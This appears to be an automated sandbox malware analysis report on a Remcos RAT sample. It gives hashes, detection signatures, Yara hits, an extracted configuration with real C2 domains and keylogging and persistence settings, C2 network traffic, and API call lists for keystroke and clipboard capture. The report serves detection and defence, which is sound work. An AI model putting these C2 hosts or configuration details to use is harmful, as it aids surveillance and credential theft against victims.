Windows Analysis Report
kyFBQxVbsg.exe

Overview

General Information

Sample Name: kyFBQxVbsg.exe
Analysis ID: 652393
MD5: 972334f0c55d0aeab0b32efe41ea3470
SHA1: e9097b5cd1f976ecaf0accedf14f1d22bd72e6fa
SHA256: eb91bf1e2eb3877f0942cef113bb0fb76e2c2fd2c2651dbf09f6da6df649e8fb
Tags: exe, RAT, RemcosRAT

Detection

Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Remcos RAT
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for dropped file
Contains functionality to steal Firefox passwords or cookies
Yara detected Costura Assembly Loader
Encrypted powershell cmdline option found
Machine Learning detection for sample
.NET source code contains potential unpacker
.NET source code contains very large array initializations
Contains functionality to inject code into remote processes
Installs a global keyboard hook
Delayed program exit found
Contains functionality to steal Chrome passwords or cookies
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Antivirus or Machine Learning detection for unpacked file
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to enumerate running services
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Creates a process in suspended mode (likely to inject code)
Contains functionality to read data from the clipboard
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to call native functions
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Detected TCP or UDP traffic on non-standard ports
Contains functionality to download and launch executables
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to simulate mouse events

Classification

AV Detection

Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe Avira: detection malicious, Label: TR/Dropper.MSIL.Gen
Source: kyFBQxVbsg.exe Virustotal: Detection: 46%
Source: kyFBQxVbsg.exe ReversingLabs: Detection: 57%
Source: Yara match File source: 17.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.Qerdo.exe.40dfb10.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.Qerdo.exe.35cfb10.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.Qerdo.exe.40dfb10.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.kyFBQxVbsg.exe.38cfb10.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.kyFBQxVbsg.exe.38cfb10.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.Qerdo.exe.35cfb10.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000011.00000000.535499326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.533973605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000000.594041394.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.601490372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.612287399.00000000040DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000000.592527384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.536706156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.533640248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.534323754.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000000.591921739.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.607934228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.598510412.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.606949507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000000.593660616.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.603389337.000000000352F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.541310066.000000000382F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000000.594464654.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000000.595033873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.536064780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.603526142.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.534848870.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.599641579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.599125899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.596165958.0000000000BC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.646242553.00000000011E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.612156985.000000000403F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.541421315.00000000038CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000000.593157225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.608522925.0000000000B37000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.595851570.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.606295959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.605837275.00000000035CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: kyFBQxVbsg.exe PID: 6232, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 6528, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Qerdo.exe PID: 6216, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Qerdo.exe PID: 5652, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 5836, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 6304, type: MEMORYSTR
Source: kyFBQxVbsg.exe Avira: detected
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe ReversingLabs: Detection: 57%
Source: kyFBQxVbsg.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe Joe Sandbox ML: detected
Source: 26.2.InstallUtil.exe.400000.0.unpack Avira: Label: BDS/Backdoor.Gen
Source: 26.0.InstallUtil.exe.400000.1.unpack Avira: Label: BDS/Backdoor.Gen
Source: 26.0.InstallUtil.exe.400000.7.unpack Avira: Label: BDS/Backdoor.Gen
Source: 17.0.InstallUtil.exe.400000.8.unpack Avira: Label: BDS/Backdoor.Gen
Source: 0.2.kyFBQxVbsg.exe.2e0000.0.unpack Avira: Label: TR/Dropper.MSIL.Gen
Source: 28.0.InstallUtil.exe.400000.5.unpack Avira: Label: BDS/Backdoor.Gen
Source: 26.0.InstallUtil.exe.400000.0.unpack Avira: Label: BDS/Backdoor.Gen
Source: 17.0.InstallUtil.exe.400000.2.unpack Avira: Label: BDS/Backdoor.Gen
Source: 17.0.InstallUtil.exe.400000.3.unpack Avira: Label: BDS/Backdoor.Gen
Source: 17.0.InstallUtil.exe.400000.4.unpack Avira: Label: BDS/Backdoor.Gen
Source: 19.2.Qerdo.exe.40000.0.unpack Avira: Label: TR/Dropper.MSIL.Gen
Source: 28.0.InstallUtil.exe.400000.3.unpack Avira: Label: BDS/Backdoor.Gen
Source: 17.0.InstallUtil.exe.400000.7.unpack Avira: Label: BDS/Backdoor.Gen
Source: 28.0.InstallUtil.exe.400000.7.unpack Avira: Label: BDS/Backdoor.Gen
Source: 17.0.InstallUtil.exe.400000.1.unpack Avira: Label: BDS/Backdoor.Gen
Source: 26.0.InstallUtil.exe.400000.2.unpack Avira: Label: BDS/Backdoor.Gen
Source: 17.0.InstallUtil.exe.400000.6.unpack Avira: Label: BDS/Backdoor.Gen
Source: 19.0.Qerdo.exe.40000.0.unpack Avira: Label: TR/Dropper.MSIL.Gen
Source: 28.2.InstallUtil.exe.400000.0.unpack Avira: Label: BDS/Backdoor.Gen
Source: 28.0.InstallUtil.exe.400000.4.unpack Avira: Label: BDS/Backdoor.Gen
Source: 17.0.InstallUtil.exe.400000.5.unpack Avira: Label: BDS/Backdoor.Gen
Source: 28.0.InstallUtil.exe.400000.6.unpack Avira: Label: BDS/Backdoor.Gen
Source: 24.2.Qerdo.exe.9a0000.0.unpack Avira: Label: TR/Dropper.MSIL.Gen
Source: 28.0.InstallUtil.exe.400000.1.unpack Avira: Label: BDS/Backdoor.Gen
Source: 26.0.InstallUtil.exe.400000.8.unpack Avira: Label: BDS/Backdoor.Gen
Source: 24.0.Qerdo.exe.9a0000.0.unpack Avira: Label: TR/Dropper.MSIL.Gen
Source: 26.0.InstallUtil.exe.400000.5.unpack Avira: Label: BDS/Backdoor.Gen
Source: 17.2.InstallUtil.exe.400000.0.unpack Avira: Label: BDS/Backdoor.Gen
Source: 0.0.kyFBQxVbsg.exe.2e0000.0.unpack Avira: Label: TR/Dropper.MSIL.Gen
Source: 17.0.InstallUtil.exe.400000.0.unpack Avira: Label: BDS/Backdoor.Gen
Source: 28.0.InstallUtil.exe.400000.0.unpack Avira: Label: BDS/Backdoor.Gen
Source: 26.0.InstallUtil.exe.400000.6.unpack Avira: Label: BDS/Backdoor.Gen
Source: 26.0.InstallUtil.exe.400000.4.unpack Avira: Label: BDS/Backdoor.Gen
Source: 28.0.InstallUtil.exe.400000.2.unpack Avira: Label: BDS/Backdoor.Gen
Source: 28.0.InstallUtil.exe.400000.8.unpack Avira: Label: BDS/Backdoor.Gen
Source: 26.0.InstallUtil.exe.400000.3.unpack Avira: Label: BDS/Backdoor.Gen
Source: 26.2.InstallUtil.exe.400000.0.unpack Malware Configuration Extractor: Remcos {"Version": "3.5.1 Pro", "Host:Port:Password": "nikahuve.ac.ug:6968:0kalskala.ac.ug:6968:0tuekisaa.ac.ug:6968:0parthaha.ac.ug:6968:0", "Assigned name": "06192022", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "cvxyttydfsgbghfgfhtd-RXTSAM", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "scxs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "notepad;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "forbas", "Keylog file max size": "0"}
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_00430185 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext, 17_2_00430185
Source: kyFBQxVbsg.exe, 00000000.00000002.541310066.000000000382F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: -----BEGIN PUBLIC KEY-----
Source: kyFBQxVbsg.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: kyFBQxVbsg.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: protobuf-net.pdbSHA256 source: kyFBQxVbsg.exe, 00000000.00000003.526677018.000000000398E000.00000004.00000800.00020000.00000000.sdmp, kyFBQxVbsg.exe, 00000000.00000003.526824087.0000000003A06000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582007777.000000000368E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582307729.0000000003706000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588674839.000000000419E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588792827.0000000004216000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdb source: kyFBQxVbsg.exe, 00000000.00000003.526677018.000000000398E000.00000004.00000800.00020000.00000000.sdmp, kyFBQxVbsg.exe, 00000000.00000003.526824087.0000000003A06000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582007777.000000000368E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582307729.0000000003706000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588674839.000000000419E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588792827.0000000004216000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_00406571 SetEvent,ShellExecuteW,GetLogicalDriveStringsA,GetFileAttributesW,DeleteFileW,Sleep,StrToIntA,CreateDirectoryW, 17_2_00406571
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_0040A1C4 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 17_2_0040A1C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_0040620E FindFirstFileW,FindNextFileW, 17_2_0040620E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_004162EF FindFirstFileW,FindNextFileW,FindNextFileW, 17_2_004162EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_0040A3CB FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 17_2_0040A3CB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_0044A569 FindFirstFileExA, 17_2_0044A569
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_004187B1 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose, 17_2_004187B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_00407AC0 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose, 17_2_00407AC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_00407ED2 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose, 17_2_00407ED2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_00406EEF __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose, 17_2_00406EEF

Networking

Source: Malware configuration extractor URLs: nikahuve.ac.ug
Source: Joe Sandbox View ASN Name: DANILENKODE
Source: Joe Sandbox View IP Address: 194.5.98.107
Source: global traffic TCP traffic: 192.168.2.6:49798 -> 194.5.98.107:6968
Source: InstallUtil.exe String found in binary or memory: http://geoplugin.net/json.gp
Source: kyFBQxVbsg.exe, 00000000.00000002.541310066.000000000382F000.00000004.00000800.00020000.00000000.sdmp, kyFBQxVbsg.exe, 00000000.00000002.541421315.00000000038CF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000000.535499326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000000.533640248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000002.603389337.000000000352F000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000002.605837275.00000000035CF000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000002.612287399.00000000040DF000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000002.612156985.000000000403F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000000.594041394.0000000000400000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000000.591921739.0000000000400000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.595851570.0000000000400000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 0000001C.00000000.601490372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 0000001C.00000002.607934228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 0000001C.00000000.598510412.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gp/C
Source: kyFBQxVbsg.exe, 00000000.00000002.540068634.000000000269C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: kyFBQxVbsg.exe, 00000000.00000003.526677018.000000000398E000.00000004.00000800.00020000.00000000.sdmp, kyFBQxVbsg.exe, 00000000.00000003.526824087.0000000003A06000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582007777.000000000368E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582307729.0000000003706000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588674839.000000000419E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588792827.0000000004216000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: kyFBQxVbsg.exe, 00000000.00000003.526677018.000000000398E000.00000004.00000800.00020000.00000000.sdmp, kyFBQxVbsg.exe, 00000000.00000003.526824087.0000000003A06000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582007777.000000000368E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582307729.0000000003706000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588674839.000000000419E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588792827.0000000004216000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: kyFBQxVbsg.exe, 00000000.00000003.526677018.000000000398E000.00000004.00000800.00020000.00000000.sdmp, kyFBQxVbsg.exe, 00000000.00000003.526824087.0000000003A06000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582007777.000000000368E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582307729.0000000003706000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588674839.000000000419E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588792827.0000000004216000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: kyFBQxVbsg.exe, 00000000.00000003.526677018.000000000398E000.00000004.00000800.00020000.00000000.sdmp, kyFBQxVbsg.exe, 00000000.00000003.526824087.0000000003A06000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582007777.000000000368E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582307729.0000000003706000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588674839.000000000419E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588792827.0000000004216000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: kyFBQxVbsg.exe, 00000000.00000002.540068634.000000000269C000.00000004.00000800.00020000.00000000.sdmp, kyFBQxVbsg.exe, 00000000.00000003.526677018.000000000398E000.00000004.00000800.00020000.00000000.sdmp, kyFBQxVbsg.exe, 00000000.00000003.526824087.0000000003A06000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000002.597952189.000000000239C000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582007777.000000000368E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582307729.0000000003706000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588674839.000000000419E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000002.610776047.0000000002EAC000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588792827.0000000004216000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: kyFBQxVbsg.exe, 00000000.00000003.526677018.000000000398E000.00000004.00000800.00020000.00000000.sdmp, kyFBQxVbsg.exe, 00000000.00000003.526824087.0000000003A06000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582007777.000000000368E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582307729.0000000003706000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588674839.000000000419E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588792827.0000000004216000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: unknown DNS traffic detected: queries for: nikahuve.ac.ug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_0042386F recv, 17_2_0042386F

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_00408B9A GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx, 17_2_00408B9A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_00409D9C OpenClipboard,GetClipboardData,CloseClipboard, 17_2_00409D9C
Source: Qerdo.exe, 00000013.00000002.597284812.0000000000878000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud

Source: Yara match File source: 17.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE
